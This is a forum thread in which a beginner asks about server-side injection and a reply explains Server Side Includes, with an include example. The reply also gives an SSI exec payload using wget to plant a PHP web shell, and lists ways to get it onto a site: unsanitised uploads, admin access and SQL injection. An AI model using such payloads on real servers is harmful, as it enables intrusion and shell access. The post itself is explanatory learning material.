Server Side Injection Issues
I am doing an online training and I have to know about server side injections.

Could someone please refer me to a GOOD online tutorial that explains SSI in depth for a beginner?



From what I understand, Server-side Injection is based on exploiting SSI (Server Side Includes; a simple interpreted server-side scripting language used almost exclusively for the Web).

So I think it can easily be seen as some sort of dynamic HTML based on the server-side instead of client-side. Using either some of the extensions like: .shtml, .shtm, .stm; and to have the webserver is configured to allow SSI:

For example, blog.shtml contains the following:
<!--#include virtual="../quote.txt" -->
Which includes a daily quotation. With one change to the file, all the files including blog.shtml will change its content too.

You should read more here:

So you can try to change code or add your own code to the SSI enabled pages to exploit it. Like:
<!--#exec cmd="wget | rename shell.txt shell.php" -->
Spawning a shell and such.

You should read more on owasp:

As for how you manage to change or add code, you just need to look for ways to manipulate the page. Through other vulnerabilities or otherwise. For example:
Persistent XSS.
* If there's any page uploads without proper sanitazing you can try uploading a shell or .shtml file payload:
* Maybe get into their CMS/admin/cpanel where you can add new pages or posts.
* Or maybe you've found an SQL injection vulnerability, you can try insert a new page, post or content into the page.

Just need to think outside the box I guess. Also for the record for any questions on how attacks work, I highly recommand you read the owasp wiki on it.

Possibly Related Threads…
Thread Author Replies Views Last Post
  CRLF Injection - Manipulating an HTTP Request Insider 1 1,842 06-16-2020, 12:38 PM
Last Post: dropzone
  [Tutorial] Request header MySQL injection using netcat and burp suite Insider 0 1,584 06-16-2020, 02:53 AM
Last Post: Insider
  [SSI] Server-Side Includes Injection. [Tutorial] Insider 4 3,895 03-27-2020, 04:55 PM
Last Post: Insider
  Basics of website and server hacking Insider 0 2,818 03-26-2020, 09:34 PM
Last Post: Insider